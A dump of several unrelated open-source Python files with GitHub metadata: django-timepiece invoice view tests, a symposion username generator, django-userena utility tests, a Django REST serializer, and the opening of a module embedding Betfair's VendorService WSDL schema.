self.assertEqual(invoice.end.strftime('%Y %m %d'), '2011 01 31')
self.assertEqual(len(invoice.entries.all()), 1)
# Verify that the entries were invoiced appropriately
# and the unrelated entries were untouched
entries = Entry.objects.all()
uninvoiced = entries.filter(status=Entry.NOT_INVOICED)
for entry in uninvoiced:
self.assertEqual(entry.entry_group_id, invoice.id)
class ListOutstandingInvoicesViewTestCase(ViewTestMixin, TestCase):
url_name = 'list_outstanding_invoices'
def setUp(self):
super(ListOutstandingInvoicesViewTestCase, self).setUp()
self.user = factories.Superuser()
self.login_user(self.user)
start = utils.add_timezone(datetime.datetime(2011, 1, 1, 8))
end = utils.add_timezone(datetime.datetime(2011, 1, 1, 12))
self.project_billable = factories.BillableProject()
self.project_billable2 = factories.BillableProject()
self.project_non_billable = factories.NonbillableProject()
self.entry1 = factories.Entry(
user=self.user, project=self.project_billable,
activity=factories.Activity(billable=True),
start_time=start, end_time=end, status=Entry.APPROVED)
self.entry2 = factories.Entry(
user=self.user, project=self.project_billable,
activity=factories.Activity(billable=True),
start_time=start - relativedelta(days=5),
end_time=end - relativedelta(days=5), status=Entry.APPROVED)
self.entry3 = factories.Entry(
user=self.user, project=self.project_billable2,
activity=factories.Activity(billable=False),
start_time=start - relativedelta(days=10),
end_time=end - relativedelta(days=10), status=Entry.APPROVED)
self.entry4 = factories.Entry(
user=self.user, project=self.project_non_billable,
start_time=start + relativedelta(hours=11),
end_time=end + relativedelta(hours=15), status=Entry.APPROVED)
# Default get kwargs.
self.to_date = utils.add_timezone(datetime.datetime(2011, 1, 31, 0, 0, 0))
self.get_kwargs = {
'to_date': self.to_date.strftime(DATE_FORM_FORMAT),
'statuses': list(Attribute.statuses.values_list('pk', flat=True)),
}
def test_unauthenticated(self):
self.client.logout()
response = self._get()
self.assertEquals(response.status_code, 302)
def test_list_no_kwargs(self):
response = self._get(get_kwargs={})
self.assertEquals(response.status_code, 200)
form = response.context['form']
self.assertFalse(form.is_bound)
self.assertFalse(form.is_valid())
self.assertEquals(response.context['project_totals'].count(), 3)
def test_list_outstanding(self):
"""Only billable projects should be listed."""
response = self._get()
self.assertEquals(response.status_code, 200)
form = response.context['form']
self.assertTrue(form.is_valid(), form.errors)
# The number of projects should be 3 because entry4 has billable=False
self.assertEquals(response.context['project_totals'].count(), 3)
# Verify that the date on the mark as invoiced links will be correct
self.assertEquals(response.context['to_date'], self.to_date.date())
self.assertEquals(list(response.context['unverified']), [])
self.assertEquals(list(response.context['unapproved']), [])
def test_unverified(self):
start = utils.add_timezone(datetime.datetime(2011, 1, 1, 8))
end = utils.add_timezone(datetime.datetime(2011, 1, 1, 12))
factories.Entry(
user=self.user,
project=self.project_non_billable,
start_time=start + relativedelta(hours=11),
end_time=end + relativedelta(hours=15), status=Entry.UNVERIFIED
) # unverified
response = self._get()
self.assertEquals(response.status_code, 200)
form = response.context['form']
self.assertTrue(form.is_valid(), form.errors)
unverified = list(response.context['unverified'])
unapproved = list(response.context['unapproved'])
expected_unverified = [
(self.user.pk, self.user.first_name, self.user.last_name)
]
self.assertEquals(unverified, expected_unverified)
self.assertEquals(unapproved, [])
def test_approved(self):
start = utils.add_timezone(datetime.datetime(2011, 1, 1, 8))
end = utils.add_timezone(datetime.datetime(2011, 1, 1, 12))
unapproved_entry_a = factories.Entry(
user=self.user, project=self.project_non_billable,
start_time=start + relativedelta(hours=11),
end_time=end + relativedelta(hours=15), status=Entry.VERIFIED)
unapproved_entry_b = factories.Entry(
user=self.user, project=self.project_non_billable,
start_time=start + relativedelta(hours=11),
end_time=end + relativedelta(hours=15), status=Entry.VERIFIED)
response = self._get()
self.assertEquals(response.status_code, 200)
form = response.context['form']
self.assertTrue(form.is_valid(), form.errors)
unverified = set(response.context['unverified'])
unapproved = set(response.context['unapproved'])
user_a, user_b = unapproved_entry_a.user, unapproved_entry_b.user
expected_unapproved = set([
(user_a.pk, user_a.first_name, user_a.last_name),
(user_b.pk, user_b.first_name, user_b.last_name),
])
self.assertEquals(unverified, set())
self.assertEquals(unapproved, expected_unapproved)
def test_no_statuses(self):
self.get_kwargs.pop('statuses')
response = self._get()
self.assertEquals(response.status_code, 200)
form = response.context['form']
self.assertTrue(form.is_valid(), form.errors)
self.assertEquals(response.context['project_totals'].count(), 0)
def test_to_date_required(self):
"""to_date is required."""
self.get_kwargs['to_date'] = ''
response = self._get()
self.assertEquals(response.status_code, 200)
form = response.context['form']
self.assertFalse(form.is_valid(), form.errors)
# The number of projects should be 1 because entry3 has billable=False
self.assertEquals(response.context['project_totals'].count(), 0)
def test_from_date(self):
from_date = utils.add_timezone(datetime.datetime(2011, 1, 1, 0, 0, 0))
self.get_kwargs['from_date'] = from_date.strftime(DATE_FORM_FORMAT)
response = self._get()
self.assertEquals(response.status_code, 200)
form = response.context['form']
self.assertTrue(form.is_valid(), form.errors)
# From date filters out one entry
self.assertEquals(response.context['project_totals'].count(), 1)
# Verify that the date on the mark as invoiced links will be correct
self.assertEquals(response.context['to_date'], self.to_date.date())
self.assertEquals(response.context['from_date'], from_date.date())
|
{
"content_hash": "33ed707a9727369989ae47e3e56707e8",
"timestamp": "",
"source": "github",
"line_count": 700,
"max_line_length": 91,
"avg_line_length": 44.32714285714286,
"alnum_prop": 0.630958135937349,
"repo_name": "arbitrahj/django-timepiece",
"id": "94fa41daff63c81d62d27ce08a3a045423396f06",
"size": "31029",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "timepiece/contracts/tests/test_invoices.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "24547"
},
{
"name": "HTML",
"bytes": "221742"
},
{
"name": "JavaScript",
"bytes": "203329"
},
{
"name": "Python",
"bytes": "601941"
}
],
"symlink_target": ""
}
|
import hashlib
import random
from django.contrib.auth.models import User
def generate_username(email):
def random_username():
h = hashlib.sha1(email).hexdigest()[:25]
# don't ask
n = random.randint(1, (10 ** (5 - 1)) - 1)
return "%s%d" % (h, n)
while True:
try:
username = random_username()
User.objects.get(username=username)
except User.DoesNotExist:
break
return username
|
{
"content_hash": "bb7c3b50fcc4749ee14c77e38c2301da",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 50,
"avg_line_length": 24.94736842105263,
"alnum_prop": 0.5759493670886076,
"repo_name": "PyCon/pycon",
"id": "4a214616bd4366c468657f58380de515e761ad49",
"size": "474",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "symposion/utils/signup.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "80909"
},
{
"name": "Dockerfile",
"bytes": "163"
},
{
"name": "HTML",
"bytes": "313093"
},
{
"name": "JavaScript",
"bytes": "161207"
},
{
"name": "Makefile",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "993540"
},
{
"name": "Shell",
"bytes": "14094"
},
{
"name": "Smarty",
"bytes": "7379"
}
],
"symlink_target": ""
}
|
from django.test import TestCase
from django.contrib.auth.models import User
from django.conf import settings
from django.contrib.auth.models import SiteProfileNotAvailable
from userena.utils import (get_gravatar, signin_redirect, get_profile_model,
get_protocol)
from userena import settings as userena_settings
from userena.models import UserenaBaseProfile
import hashlib
class UtilsTests(TestCase):
""" Test the extra utils methods """
fixtures = ['users']
def test_get_gravatar(self):
template = 'http://www.gravatar.com/avatar/%(hash)s?s=%(size)s&d=%(type)s'
# The hash for alice@example.com
hash = hashlib.md5('alice@example.com').hexdigest()
# Check the defaults.
self.failUnlessEqual(get_gravatar('alice@example.com'),
template % {'hash': hash,
'size': 80,
'type': 'identicon'})
# Check different size
self.failUnlessEqual(get_gravatar('alice@example.com', size=200),
template % {'hash': hash,
'size': 200,
'type': 'identicon'})
# Check different default
http_404 = get_gravatar('alice@example.com', default='404')
self.failUnlessEqual(http_404,
template % {'hash': hash,
'size': 80,
'type': '404'})
# Is it really a 404?
response = self.client.get(http_404)
self.failUnlessEqual(response.status_code, 404)
# Test the switch to HTTPS
userena_settings.USERENA_MUGSHOT_GRAVATAR_SECURE = True
template = 'https://secure.gravatar.com/avatar/%(hash)s?s=%(size)s&d=%(type)s'
self.failUnlessEqual(get_gravatar('alice@example.com'),
template % {'hash': hash,
'size': 80,
'type': 'identicon'})
# And set back to default
userena_settings.USERENA_MUGSHOT_GRAVATAR_SECURE = False
def test_signin_redirect(self):
"""
Test redirect function which should redirect the user after a
succesfull signin.
"""
# Test with a requested redirect
self.failUnlessEqual(signin_redirect(redirect='/accounts/'), '/accounts/')
# Test with only the user specified
user = User.objects.get(pk=1)
self.failUnlessEqual(signin_redirect(user=user),
'/accounts/%s/' % user.username)
# The ultimate fallback, probably never used
self.failUnlessEqual(signin_redirect(), settings.LOGIN_REDIRECT_URL)
def test_get_profile_model(self):
"""
Test if the correct profile model is returned when
``get_profile_model()`` is called.
"""
# A non existent model should also raise ``SiteProfileNotAvailable``
# error.
settings.AUTH_PROFILE_MODULE = 'userena.FakeProfile'
self.assertRaises(SiteProfileNotAvailable, get_profile_model)
# An error should be raised when there is no ``AUTH_PROFILE_MODULE``
# supplied.
settings.AUTH_PROFILE_MODULE = None
self.assertRaises(SiteProfileNotAvailable, get_profile_model)
def test_get_protocol(self):
""" Test if the correct protocol is returned """
self.failUnlessEqual(get_protocol(), 'http')
userena_settings.USERENA_USE_HTTPS = True
self.failUnlessEqual(get_protocol(), 'https')
userena_settings.USERENA_USE_HTTPS = False
|
{
"content_hash": "ebc8094051185cb52c690af9214d891a",
"timestamp": "",
"source": "github",
"line_count": 97,
"max_line_length": 86,
"avg_line_length": 38.577319587628864,
"alnum_prop": 0.5734901122394441,
"repo_name": "pjdelport/django-userena",
"id": "47452f89a20ab00eb6ae49f5ed3fb95f823d3f8e",
"size": "3742",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "userena/tests/utils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "218437"
},
{
"name": "Racket",
"bytes": "364"
},
{
"name": "Shell",
"bytes": "786"
}
],
"symlink_target": ""
}
|
from rest_framework import serializers
from django.contrib.auth.models import User
from .models import Card
class UserSimpleSerializer(serializers.ModelSerializer):
class Meta(object):
model = User
fields = ('username', 'first_name', 'last_name', 'is_staff', 'is_active', 'email')
class CardSerializer(serializers.ModelSerializer):
created_by = UserSimpleSerializer()
updated_by = UserSimpleSerializer()
class Meta(object):
model = Card
fields = '__all__'
depth = 1
|
{
"content_hash": "c059af9e7d1d85166aeed3fe99b1adc9",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 90,
"avg_line_length": 26.4,
"alnum_prop": 0.6799242424242424,
"repo_name": "neosergio/WisdomBox",
"id": "0d293177f49e12ad1523c0fde3cd7394c85dc0c9",
"size": "528",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cards/serializers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "12675"
}
],
"symlink_target": ""
}
|
'''
BfPy wsdsl variables holding the Betfair WSDL definitions
'''
#
# Variables containing the Betfair WSDL files
#
BFVendorService = '''
<?xml version="1.0" encoding="UTF-8"?>
<!--
Copyright 2003-2004 The Sporting Exchange Limited. All rights reserved.
The presentation, distribution or other dissemination of the information contained herein by The Sporting Exchange Limited (Betfair) is not a license, either expressly or impliedly, to any intellectual property owned or controlled by Betfair.
Save as provided by statute and to the fullest extent permitted by law, the following provisions set out the entire liability of Betfair (including any liability for the acts and omissions of its employees, agents and sub-contractors) to the User in respect of the use of its WSDL file whether in contract, tort, statute, equity or otherwise:
(a) The User acknowledges and agrees that (except as expressly provided in this Agreement) the WSDL is provided "AS IS" without warranties of any kind (whether express or implied);
(b) All conditions, warranties, terms and undertakings (whether express or implied, statutory or otherwise relating to the delivery, performance, quality, uninterrupted use, fitness for purpose, occurrence or reliability of the WSDL are hereby excluded to the fullest extent permitted by law; and
(c) Betfair shall not be liable to the User for loss of profit (whether direct or indirect), loss of contracts or goodwill, lost advertising, loss of data or any type of special, indirect, consequential or economic loss (including loss or damage suffered by the User as a result of an action brought by a third party) even if such loss was reasonably foreseeable or Betfair had been advised of the possibility of the User incurring such loss.
No exclusion or limitation set out in this Agreement shall apply in the case of fraud or fraudulent concealment, death or personal injury resulting from the negligence of either party or any of its employees, agents or sub-contractors; and/or any breach of the obligations implied by (as appropriate) section 12 of the Sale of Goods Act 1979, section 2 of the Supply of Goods and Services Act 1982 or section 8 of the Supply of Goods (Implied Terms) Act 1973.
-->
<wsdl:definitions name="VendorService"
xmlns:http="http://schemas.xmlsoap.org/wsdl/http/"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:types="http://www.betfair.com/adminapi/types/v2/"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:tns="http://www.betfair.com/adminapi/v2/VendorService/"
xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"
xmlns:mime="http://schemas.xmlsoap.org/wsdl/mime/"
targetNamespace="http://www.betfair.com/adminapi/v2/VendorService/"
xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">
<wsdl:types>
<xsd:schema targetNamespace="http://www.betfair.com/adminapi/types/v2/">
<xsd:import namespace="http://schemas.xmlsoap.org/soap/encoding/"/>
<xsd:complexType name="SetAccessRequestReq">
<xsd:complexContent>
<xsd:extension base="types:APIRequest">
<xsd:sequence>
<xsd:element name="accessRequestToken" nillable="false" type="xsd:string"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="SetAccessRequestResp">
<xsd:complexContent>
<xsd:extension base="types:APIResponse">
<xsd:sequence>
<xsd:element name="vendorSoftwareId" nillable="false" type="xsd:int"/>
<xsd:element name="vendorClientId" nillable="false" type="xsd:int"/>
<xsd:element name="vendorSoftwareName" nillable="false" type="xsd:string"/>
<xsd:element name="expiryDate" nillable="false" type="xsd:dateTime"/>
<xsd:element name="errorCode" type="types:SetAccessRequestErrorEnum"/>
<xsd:element name="minorErrorCode" nillable="true" type="xsd:string"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:simpleType name="SetAccessRequestErrorEnum">
<xsd:restriction base="xsd:string">
<xsd:enumeration value="OK"/>
<xsd:enumeration value="INVALID_ACCESS_REQUEST_TOKEN"/>
<xsd:enumeration value="REQUEST_ALREADY_DONE"/>
<xsd:enumeration value="REQUEST_EXPIRED"/>
<xsd:enumeration value="REQUEST_CANCELLED"/>
<xsd:enumeration value='VENDOR_SOFTWARE_INVALID'/>
<xsd:enumeration value='VENDOR_SOFTWARE_INACTIVE'/>
<xsd:enumeration value='USER_ALREADY_SUBSCRIBED'/>
<xsd:enumeration value="API_ERROR"/>
</xsd:restriction>
</xsd:simpleType>
<xsd:complexType name="CancelVendorAccessRequestReq">
<xsd:complexContent>
<xsd:extension base="types:APIRequest">
<xsd:sequence>
<xsd:element name="accessRequestToken" nillable="false" type="xsd:string"/>
<xsd:element name="vendorSoftwareId" nillable="false" type="xsd:int"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="CancelVendorAccessRequestResp">
<xsd:complexContent>
<xsd:extension base="types:APIResponse">
<xsd:sequence>
<xsd:element name="errorCode" type="types:CancelVendorAccessRequestErrorEnum"/>
<xsd:element name="minorErrorCode" nillable="true" type="xsd:string"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:simpleType name="CancelVendorAccessRequestErrorEnum">
<xsd:restriction base="xsd:string">
<xsd:enumeration value="OK"/>
<xsd:enumeration value="INVALID_VENDOR_SOFTWARE_ID"/>
<xsd:enumeration value="INVALID_VENDOR_SESSION" />
<xsd:enumeration value="OPERATOR_NOT_VENDORSOFTWARE_OWNER" />
<xsd:enumeration value='INVALID_ACCESS_REQUEST_TOKEN'/>
<xsd:enumeration value='INVALID_VENDOR_CLIENT_ACCESS_REQUEST_STATUS'/>
<xsd:enumeration value='VENDOR_SOFTWARE_INVALID'/>
<xsd:enumeration value='VENDOR_SOFTWARE_INACTIVE'/>
<xsd:enumeration value="API_ERROR"/>
</xsd:restriction>
</xsd:simpleType>
<xsd:complexType name="GetVendorAccessRequestsReq">
<xsd:complexContent>
<xsd:extension base="types:APIRequest">
<xsd:sequence>
<xsd:element name="vendorSoftwareId" nillable="false" type="xsd:int"/>
<xsd:element name="status" type="types:VendorClientAccessRequestStatusEnum"/>
<xsd:element name="requestDateFrom" nillable="true" type="xsd:dateTime"/>
<xsd:element name="requestDateTo" nillable="true" type="xsd:dateTime"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="GetVendorAccessRequestsResp">
<xsd:complexContent>
<xsd:extension base="types:APIResponse">
<xsd:sequence>
<xsd:element name="vendorAccessRequests" nillable="true" type="types:ArrayOfVendorAccessRequest"/>
<xsd:element name="errorCode" type="types:GetVendorAccessRequestsErrorEnum"/>
<xsd:element name="minorErrorCode" nillable="true" type="xsd:string"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="ArrayOfVendorAccessRequest">
<xsd:sequence>
<xsd:element name="vendorAccessRequest" form="qualified" maxOccurs="unbounded"
nillable="true" type="types:VendorAccessRequest"/>
</xsd:sequence>
</xsd:complexType>
<xsd:complexType name="VendorAccessRequest">
<xsd:sequence>
<xsd:element name="vendorSoftwareId" nillable="false" type="xsd:int"/>
<xsd:element name="vendorCustomField" nillable="false" type="xsd:string"/>
<xsd:element name="vendorClientId" nillable="false" type="xsd:int"/>
<xsd:element name="accessRequestToken" nillable="false" type="xsd:string"/>
<xsd:element name="expiryDate" nillable="false" type="xsd:dateTime"/>
<xsd:element name="status" nillable="true" type="types:VendorClientAccessRequestStatusEnum"/>
</xsd:sequence>
</xsd:complexType>
<xsd:simpleType name="GetVendorAccessRequestsErrorEnum">
<xsd:restriction base="xsd:string">
<xsd:enumeration value="OK"/>
<xsd:enumeration value="INVALID_VENDOR_SOFTWARE_ID"/>
<xsd:enumeration value="INVALID_VENDOR_SESSION" />
<xsd:enumeration value="OPERATOR_NOT_VENDORSOFTWARE_OWNER" />
<xsd:enumeration value='VENDOR_SOFTWARE_INACTIVE'/>
<xsd:enumeration value='INVALID_STATUS'/>
<xsd:enumeration value='NO_RESULTS'/>
<xsd:enumeration value="API_ERROR"/>
</xsd:restriction>
</xsd:simpleType>
<xsd:simpleType name="VendorClientAccessRequestStatusEnum">
<xsd:restriction base="xsd:string">
<xsd:enumeration value="ACTIVE"/>
<xsd:enumeration value="CANCELLED"/>
<xsd:enumeration value="EXPIRED"/>
<xsd:enumeration value="DONE"/>
</xsd:restriction>
</xsd:simpleType>
<xsd:complexType name="CreateVendorAccessRequestReq">
<xsd:complexContent>
<xsd:extension base="types:APIRequest">
<xsd:sequence>
<xsd:element name="vendorCustomField" nillable="false" type="xsd:string"/>
<xsd:element name="vendorSoftwareId" nillable="false" type="xsd:int"/>
<xsd:element name="expiryDate" nillable="true" type="xsd:dateTime"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="CreateVendorAccessRequestResp">
<xsd:complexContent>
<xsd:extension base="types:APIResponse">
<xsd:sequence>
<xsd:element name="errorCode" type="types:CreateVendorAccessRequestErrorEnum"/>
<xsd:element name="minorErrorCode" nillable="true" type="xsd:string"/>
<xsd:element name="accessRequestToken" nillable="true" type="xsd:string"/>
<xsd:element name="validUntil" type="xsd:dateTime"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:simpleType name="CreateVendorAccessRequestErrorEnum">
<xsd:restriction base="xsd:string">
<xsd:enumeration value='OK'/>
<xsd:enumeration value='INVALID_VENDOR_SOFTWARE_ID'/>
<xsd:enumeration value='INVALID_VENDOR_SESSION'/>
<xsd:enumeration value='OPERATOR_NOT_VENDORSOFTWARE_OWNER'/>
<xsd:enumeration value='LOGIN_RESTRICTED_LOCATION'/>
<xsd:enumeration value='VENDOR_SOFTWARE_INVALID'/>
<xsd:enumeration value='VENDOR_SOFTWARE_INACTIVE'/>
<xsd:enumeration value='INVALID_VENDOR_CUSTOM_FIELD'/>
<xsd:enumeration value='INVALID_EXPIRY_DATE'/>
<xsd:enumeration value='API_ERROR'/>
</xsd:restriction>
</xsd:simpleType>
<xsd:complexType name="VendorSubscriptionReq">
<xsd:complexContent>
<xsd:extension base="types:APIRequest">
<xsd:sequence>
<xsd:element name="username" nillable="false" type="xsd:string"/>
<xsd:element name="vendorCustomField" nillable="false" type="xsd:string"/>
<xsd:element name="vendorClientId" nillable="false" type="xsd:int"/>
<xsd:element name="vendorSoftwareId" nillable="false" type="xsd:int"/>
<xsd:element name="expiryDate" nillable="true" type="xsd:dateTime"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="VendorSubscriptionResp">
<xsd:complexContent>
<xsd:extension base="types:APIResponse">
<xsd:sequence>
<xsd:element name="errorCode" type="types:VendorSubscriptionErrorEnum"/>
<xsd:element name="minorErrorCode" nillable="true" type="xsd:string"/>
<xsd:element name="validUntil" type="xsd:dateTime"/>
<xsd:element name="vendorClientId" nillable="false" type="xsd:int"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:simpleType name="VendorSubscriptionErrorEnum">
<xsd:restriction base="xsd:string">
<xsd:enumeration value="OK"/>
<xsd:enumeration value="INVALID_USERNAME"/>
<xsd:enumeration value="USER_NOT_ACCOUNT_OWNER"/>
<xsd:enumeration value="INVALID_VENDOR_SOFTWARE_ID"/>
<xsd:enumeration value="LOGIN_FAILED_ACCOUNT_LOCKED"/>
<xsd:enumeration value="ACCOUNT_SUSPENDED"/>
<xsd:enumeration value="ACCOUNT_CLOSED"/>
<xsd:enumeration value="INVALID_VENDOR_SESSION" />
<xsd:enumeration value="OPERATOR_NOT_VENDORSOFTWARE_OWNER" />
<xsd:enumeration value="LOGIN_RESTRICTED_LOCATION"/>
<xsd:enumeration value="USER_ALREADY_SUBSCRIBED"/>
<xsd:enumeration value="INVALID_VENDOR_CLIENT_ID"/>
<xsd:enumeration value="INVALID_VENDOR_CUSTOM_FIELD"/>
<xsd:enumeration value="INVALID_INPUT_PARAMETERS"/>
<xsd:enumeration value="API_ERROR"/>
</xsd:restriction>
</xsd:simpleType>
<xsd:complexType name="CancelVendorSubscriptionReq">
<xsd:complexContent>
<xsd:extension base="types:APIRequest">
<xsd:sequence>
<xsd:element name="username" nillable="false" type="xsd:string"/>
<xsd:element name="vendorSoftwareId" nillable="false" type="xsd:int"/>
<xsd:element name="vendorClientId" nillable="false" type="xsd:int"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="CancelVendorSubscriptionResp">
<xsd:complexContent>
<xsd:extension base="types:APIResponse">
<xsd:sequence>
<xsd:element name="errorCode" type="types:VendorSubscriptionErrorEnum"/>
<xsd:element name="minorErrorCode" nillable="true" type="xsd:string"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="GetSubscriptionInfoReq">
<xsd:complexContent>
<xsd:extension base="types:APIRequest">
<xsd:sequence>
<xsd:element name="username" nillable="false" type="xsd:string"/>
<xsd:element name="vendorClientId" nillable="false" type="xsd:int"/>
<xsd:element name="vendorSoftwareId" nillable="false" type="xsd:int"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="GetSubscriptionInfoResp">
<xsd:complexContent>
<xsd:extension base="types:APIResponse">
<xsd:sequence>
<xsd:element name="vendorSoftware" nillable="true" type="xsd:int"/>
<xsd:element name="expiryDate" nillable="true" type="xsd:dateTime"/>
<xsd:element name="errorCode" type="types:VendorSubscriptionErrorEnum"/>
<xsd:element name="minorErrorCode" nillable="true" type="xsd:string"/>
<xsd:element name="status" nillable="true" type="types:VendorSoftwareClientStatusEnum"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="GetVendorInfoReq">
<xsd:complexContent>
<xsd:extension base="types:APIRequest"/>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="GetVendorInfoResp">
<xsd:complexContent>
<xsd:extension base="types:APIResponse">
<xsd:sequence>
<xsd:element name="vendorInfo" nillable="true" type="types:ArrayOfVendorSoftwareInfos"/>
<xsd:element name="errorCode" type="types:VendorSubscriptionErrorEnum"/>
<xsd:element name="minorErrorCode" nillable="true" type="xsd:string"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="ArrayOfVendorSoftwareInfos">
<xsd:sequence>
<xsd:element name="vsInfo" form="qualified" maxOccurs="unbounded"
nillable="true" type="types:VendorSoftwareInfo"/>
</xsd:sequence>
</xsd:complexType>
<xsd:complexType name="VendorSoftwareInfo">
<xsd:sequence>
<xsd:element name="vendorSoftwareId" nillable="false" type="xsd:int"/>
<xsd:element name="vendorSoftwareName" nillable="false" type="xsd:string"/>
<xsd:element name="activeClientsNo" type="xsd:long"/>
</xsd:sequence>
</xsd:complexType>
<xsd:complexType name="GetVendorUsersReq">
<xsd:complexContent>
<xsd:extension base="types:APIRequest">
<xsd:sequence>
<xsd:element name="vendorSoftwareId" nillable="false" type="xsd:int"/>
<xsd:element name="username" nillable="true" type="xsd:string"/>
<xsd:element name="usernameSearchModifier" type="types:SearchModifierEnum"/>
<xsd:element name="vendorCustomField" nillable="true" type="xsd:string"/>
<xsd:element name="customFieldSearchModifier" type="types:SearchModifierEnum"/>
<xsd:element name="expiryDateFrom" nillable="true" type="xsd:dateTime"/>
<xsd:element name="expiryDateTo" nillable="true" type="xsd:dateTime"/>
<xsd:element name="status" type="types:VendorSoftwareClientStatusEnum"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:simpleType name="SearchModifierEnum">
<xsd:restriction base="xsd:string">
<xsd:enumeration value="STARTS_WITH"/>
<xsd:enumeration value="EXACT"/>
<xsd:enumeration value="ENDS_WITH"/>
<xsd:enumeration value="CONTAINS"/>
</xsd:restriction>
</xsd:simpleType>
<xsd:complexType name="GetVendorUsersResp">
<xsd:complexContent>
<xsd:extension base="types:APIResponse">
<xsd:sequence>
<xsd:element name="vendorUsers" nillable="true" type="types:ArrayOfVendorUser"/>
<xsd:element name="errorCode" type="types:VendorSubscriptionErrorEnum"/>
<xsd:element name="minorErrorCode" nillable="true" type="xsd:string"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="ArrayOfVendorUser">
<xsd:sequence>
<xsd:element name="vendorUser" form="qualified" maxOccurs="unbounded"
nillable="true" type="types:VendorUser"/>
</xsd:sequence>
</xsd:complexType>
<xsd:complexType name="VendorUser">
<xsd:sequence>
<xsd:element name="vendorSoftwareId" nillable="false" type="xsd:int"/>
<xsd:element name="username" nillable="false" type="xsd:string"/>
<xsd:element name="expiryDate" nillable="true" type="xsd:dateTime"/>
<xsd:element name="status" nillable="true" type="types:VendorSoftwareClientStatusEnum"/>
<xsd:element name="vendorClientId" nillable="false" type="xsd:int"/>
<xsd:element name="vendorCustomField" nillable="false" type="xsd:string"/>
<xsd:element name="createDate" nillable="true" type="xsd:dateTime"/>
</xsd:sequence>
</xsd:complexType>
<xsd:simpleType name="VendorSoftwareClientStatusEnum">
<xsd:restriction base="xsd:string">
<xsd:enumeration value="ACTIVE"/>
<xsd:enumeration value="CANCELLED"/>
<xsd:enumeration value="EXPIRED"/>
</xsd:restriction>
</xsd:simpleType>
<!-- base types copied from BFService wsdl-->
<xsd:complexType abstract="true" name="APIRequest">
<xsd:sequence>
<xsd:element name="header" nillable="true" type="types:APIRequestHeader"/>
</xsd:sequence>
</xsd:complexType>
<xsd:complexType name="APIRequestHeader">
<xsd:sequence>
<xsd:element name="clientStamp" type="xsd:long"/>
<xsd:element name="sessionToken" nillable="true" type="xsd:string"/>
</xsd:sequence>
</xsd:complexType>
<xsd:complexType abstract="true" name="APIResponse">
<xsd:sequence>
<xsd:element name="header" nillable="true" type="types:APIResponseHeader"/>
</xsd:sequence>
</xsd:complexType>
<xsd:complexType name="APIResponseHeader">
<xsd:sequence>
<xsd:element name="errorCode" type="types:APIErrorEnum"/>
<xsd:element name="minorErrorCode" nillable="true" type="xsd:string"/>
<xsd:element name="sessionToken" nillable="true" type="xsd:string"/>
<xsd:element name="timestamp" type="xsd:dateTime"/>
</xsd:sequence>
</xsd:complexType>
<xsd:simpleType name="APIErrorEnum">
<xsd:restriction base="xsd:string">
<xsd:enumeration value="OK"/>
<xsd:enumeration value="INTERNAL_ERROR"/>
<xsd:enumeration value="EXCEEDED_THROTTLE"/>
<xsd:enumeration value="USER_NOT_SUBSCRIBED_TO_PRODUCT"/>
<xsd:enumeration value="SUBSCRIPTION_INACTIVE_OR_SUSPENDED"/>
<xsd:enumeration value="VENDOR_SOFTWARE_INACTIVE"/>
<xsd:enumeration value="VENDOR_SOFTWARE_INVALID"/>
<xsd:enumeration value="SERVICE_NOT_AVAILABLE_IN_PRODUCT"/>
<xsd:enumeration value="NO_SESSION"/>
<xsd:enumeration value="TOO_MANY_REQUESTS"/>
<xsd:enumeration value="PRODUCT_REQUIRES_FUNDED_ACCOUNT"/>
<xsd:enumeration value="SERVICE_NOT_AVAILABLE_FOR_LOGIN_STATUS"/>
</xsd:restriction>
</xsd:simpleType>
</xsd:schema>
<xsd:schema elementFormDefault="qualified" targetNamespace="http://www.betfair.com/adminapi/v2/VendorService/">
<xsd:import namespace="http://www.betfair.com/adminapi/types/v2/"/>
